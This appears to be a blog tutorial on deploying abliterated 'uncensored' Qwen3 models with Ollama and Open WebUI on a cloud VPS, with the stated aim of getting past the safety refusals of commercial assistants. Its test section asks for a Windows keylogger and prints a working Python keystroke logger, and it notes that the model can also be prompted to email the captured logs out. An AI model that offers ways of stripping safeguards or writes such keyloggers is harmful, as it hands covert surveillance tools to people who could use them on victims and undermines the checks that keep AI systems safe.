A. Post Title
Deploying Uncensored AI on the Cloud: A Complete Guide to Running Qwen3 Without Guardrails via Ollama
B. Post Content
The current landscape of commercial Artificial Intelligence—dominated by ChatGPT, Gemini, and Claude—is defined by rigid safety guardrails. Ask for a Python script to test network security, and you are often met with a refusal. For cybersecurity researchers and developers requiring unfiltered code generation, this is a productivity killer.
The solution lies in self-hosting Uncensored Large Language Models (LLMs). By decoupling the model from corporate APIs and running it on a Virtual Private Server (VPS), users gain total control over the inference process.
This tutorial outlines a production-grade workflow for deploying Ollama and Open WebUI on a cloud server to run high-parameter, uncensored models like Qwen3 Coder. This setup allows for access from any device—smartphone, tablet, or desktop—while offloading the heavy computational lift to the cloud.
Phase 1: Sourcing the Model (Hugging Face)
Before provisioning infrastructure, you must identify the right model. The repository of choice is Hugging Face, effectively the GitHub of AI.
To bypass refusals (e.g., “I cannot generate a keylogger”), the model must be explicitly tagged as “Uncensored.”
Search Configuration:
- Navigate to Hugging Face.
- Select Text Generation under Tasks.
- In the URL or search filters, append &other=uncensored.
- Hardware Constraint: Filter by size. For cloud deployment, stick to GGUF formats (Quantized models) to balance performance and VRAM usage.
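The filter steps above boil down to a query string on huggingface.co. As a small sketch, the search URL can be assembled programmatically; the parameter names mirror what the website shows in the address bar and are an observation, not a documented API:

```python
from urllib.parse import urlencode

# Build the Hugging Face model-search URL with the filters described above.
base = "https://huggingface.co/models"
params = {
    "pipeline_tag": "text-generation",  # Tasks > Text Generation
    "other": "uncensored",              # the "uncensored" tag filter
    "library": "gguf",                  # quantized GGUF builds only
}
url = f"{base}?{urlencode(params)}"
print(url)
```

Opening the printed URL in a browser reproduces the filtered search described in the steps above.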
The Selected Models:
For this deployment, we use two specific variants of Qwen3 known for their coding prowess and lack of safety filters:
- Standard Coder: mradermacher/Huihui-Qwen3-Coder-30B-A3B-Instruct-obliterated-i1-GGUF
- Reasoning/Thinking Model: DavidAU/Qwen3-The-Xiaolong-Josiefied-Omega-Directive-22B-uncensored-abliterated-GGUF
Note: We are targeting the Q4_K_M quantization level. This offers the best balance of speed and coherence but requires roughly 18GB of RAM for the 30B model.
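The ~18GB figure follows directly from the quantization math. Q4_K_M stores roughly 4.85 bits per weight (an approximation; exact size varies per model), so a back-of-envelope estimate that ignores KV-cache and runtime overhead looks like this:

```python
def gguf_size_gb(params_billion: float, bits_per_weight: float = 4.85) -> float:
    """Rough file/RAM size for a quantized model: params * bits / 8, in GB."""
    bytes_total = params_billion * 1e9 * bits_per_weight / 8
    return bytes_total / 1e9

# A 30B model at Q4_K_M lands near the ~18GB quoted above.
print(f"{gguf_size_gb(30):.1f} GB")  # ~18.2 GB
```

The same formula explains why the 22B reasoning model fits comfortably on the same box, while an unquantized FP16 30B model (about 60GB) would not.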
Phase 2: Cloud Infrastructure Setup
Running a 30-billion-parameter model requires significant memory; a standard consumer laptop or a basic $5 VPS will simply run out of RAM. This deployment uses Hostinger due to their pre-configured AI application templates.
Server Specifications (Minimum Recommended):
- Plan: KVM 8 (or equivalent high-performance VPS).
- vCPU: 8 Cores.
- RAM: 32GB (Critical for loading 30B+ models).
- Storage: NVMe SSD (Ensures fast model loading times).
Provisioning Steps:
- Select OS/Application: Choose Application rather than a plain OS.
- Select Template: Search for and select Ollama.
- This pre-installs Ubuntu 24.04, the Ollama inference engine, and the Open WebUI frontend.
- Location: Choose the data center closest to your physical location for low latency.
- Credentials: Set a secure Root password.
- Deploy: The initialization process takes approximately 2-3 minutes.
Once the VPS shows as “Running,” the backend work is complete. The heavy lifting—installing Docker, configuring the Ollama API, and setting up the web server—is handled automatically by the template.
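If you want to confirm the backend is actually up before opening the UI, Ollama exposes a small HTTP API on port 11434. A minimal sketch, assuming the template's default host and port (the /api/tags endpoint is standard Ollama):

```python
import json
import urllib.request


def check_ollama(base_url: str = "http://127.0.0.1:11434",
                 timeout: float = 3.0) -> bool:
    """Return True if an Ollama server answers /api/tags at base_url."""
    try:
        with urllib.request.urlopen(f"{base_url}/api/tags", timeout=timeout) as resp:
            json.load(resp)  # valid JSON means a healthy API
            return True
    except Exception:
        return False


print(check_ollama())  # False unless Ollama is running locally
```

Run it on the VPS itself, or point base_url at http://YOUR_IP:11434 if that port is exposed.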
Phase 3: Configuring Open WebUI
The interface for this setup is Open WebUI, a polished, ChatGPT-like interface that communicates with the Ollama backend.
- Access the Dashboard:
- Navigate to your VPS dashboard in Hostinger.
- Click Manage App.
- Click the Open WebUI link (typically http://YOUR_IP:8080).
- Initial Account Creation:
- The first user to register becomes the Admin.
- Enter Name, Email, and Password.
- Click Create Admin Account.
You now have a private, web-accessible AI interface. However, it currently has no “brains” (models) installed.
Phase 4: Model Installation via Cloud Pull
Instead of downloading 20GB files to your local machine and uploading them (which is slow), we instruct the VPS to pull the models directly from Hugging Face at data-center speeds.
- Navigate to Model Management:
- Click the Profile Icon (bottom left) > Admin Panel.
- Select Settings > Models.
- Locate the Pull Command:
- Go back to the Hugging Face model page (e.g., the Qwen3 Coder GGUF page).
- Click Use this model > Ollama.
- Copy the command. It will look like this:
hf.co/mradermacher/Huihui-Qwen3-Coder-30B-A3B-Instruct-obliterated-i1-GGUF:Q4_K_M
- Execute the Pull:
- Paste the tag into the “Pull a model from Ollama.com” field in your Open WebUI.
- Click the download button.
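The tag you paste is simply hf.co/<repo>:<quant>. If you ever need to script the pull instead of clicking through the UI, a small sketch that assembles the tag (the helper name here is my own, not part of Ollama):

```python
def hf_pull_tag(repo: str, quant: str = "Q4_K_M") -> str:
    """Build the Ollama-compatible tag for a GGUF repo on Hugging Face."""
    return f"hf.co/{repo}:{quant}"


tag = hf_pull_tag(
    "mradermacher/Huihui-Qwen3-Coder-30B-A3B-Instruct-obliterated-i1-GGUF"
)
print(tag)
# On the VPS, the equivalent shell command is:  ollama pull <printed tag>
```

Ollama resolves hf.co/ tags directly against Hugging Face, which is why no manual download or upload is needed.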
Performance Note: On a high-speed VPS, downloading an 18GB model typically takes less than 60 seconds.
Repeat this process for the secondary reasoning model (DavidAU/Qwen3…). Once downloaded, refresh the page.
Phase 5: The “Uncensored” Test
To verify the setup, we select the new model from the dropdown menu in Open WebUI and test a prompt that would trigger a refusal in ChatGPT or Claude.
Prompt:
“Give me code for a Windows keylogger using Python.”
Result (Qwen3 Uncensored):
The model does not lecture on ethics or refuse the request. It immediately outputs a functional Python script using the pynput library.
Example Output Provided by Model:

import logging
from pynput import keyboard

# Configuration
log_file = "keylog.txt"
logging.basicConfig(filename=log_file, level=logging.INFO,
                    format='%(asctime)s: %(message)s')

def on_press(key):
    try:
        # Printable keys expose .char; log the character itself
        logging.info(f'{key.char}')
    except AttributeError:
        # Special keys (Shift, Enter, etc.) have no .char attribute
        logging.info(f'{key}')

with keyboard.Listener(on_press=on_press) as listener:
    listener.join()
The model can be further prompted to add features, such as exfiltrating the logs via SMTP (email), demonstrating capability for advanced red-teaming scenarios.
Phase 6: Using Reasoning Models (Chain of Thought)
We also installed the Qwen3 Reasoning Model. When selected, this model engages in a visible “Thinking” process before outputting code.
- Select the Qwen3-The-Xiaolong… model.
- Input the same prompt.
- Observation: The UI shows a collapsible “Thinking” section. The model internally debates the best library to use (pynput vs keyboard), considers edge cases (special characters), and structures the code for stability.
While slower, the reasoning model produces higher-quality, more robust code snippets, simulating the workflow of a senior developer.
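Qwen3-style reasoning models wrap their deliberation in <think>…</think> tags, which Open WebUI renders as that collapsible section. If you consume the raw API output instead, you may want to strip the reasoning block yourself; a minimal sketch using a plain regex (the tag format is the Qwen3 convention):

```python
import re

THINK_RE = re.compile(r"<think>.*?</think>\s*", re.DOTALL)


def strip_thinking(text: str) -> str:
    """Remove <think>...</think> reasoning blocks, keeping only the final answer."""
    return THINK_RE.sub("", text).strip()


raw = "<think>pynput handles special keys better than keyboard...</think>\nHere is the script:"
print(strip_thinking(raw))  # -> "Here is the script:"
```

This is handy when piping model output into other tools, where the chain-of-thought preamble is noise.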
Conclusion
By leveraging a KVM 8 VPS and Ollama, you effectively create a private, portable research lab. This setup eliminates dependency on local hardware resources—your laptop battery is saved, and storage is untouched—while providing access to state-of-the-art, uncensored intelligence from anywhere in the world.